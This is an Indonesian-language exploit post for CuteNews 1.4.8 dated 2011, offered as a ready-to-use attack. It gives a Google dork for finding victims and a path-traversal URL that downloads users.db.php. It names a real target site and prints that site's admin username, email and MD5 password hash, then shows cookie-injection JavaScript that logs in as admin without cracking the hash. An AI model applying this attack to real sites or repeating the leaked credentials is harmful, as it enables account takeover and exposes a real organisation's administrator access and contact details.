Exploitasi login tanpa harus decrypt md5

Judul Eksploit : CuteNews Exploit

Tanggal : 11 mei 2011

Author : Zidny

Software Link : http://www.cutephp.com/

Version : 1.4.8

Kategori : Php

Tested on : Linux, Windows

--------------------------------------------------

Google Dork : inurl:"news/file.php?file="

--------------------------------------------------

Exploit & POC :



target = http://counter.internationalmigrants.org/



Download user = http://counter.internationalmigrants.org/news/file.php?file=..%2Fusers.db.php



found data: 1219972316|1|admin|3602411b3179a890e22506ae4aef486b|admin|web@internationalmigrants.org|25|0||1223373374||


admin|3602411b3179a890e22506ae4aef486b << user | pass


login page = http://counter.internationalmigrants.org/news/

how to login = tidak usah crack md5nya... cukup injek biskuit... :v

javascript:void(document.cookie="username=admin"); javascript:void(document.cookie="md5_password=3602411b3179a890e22506ae4aef486b");

refresh http://counter.internationalmigrants.org/news/

taraa.......

selamat berkreasi ^_^

http://kedirihackerlink.org/

--------------------------------------------------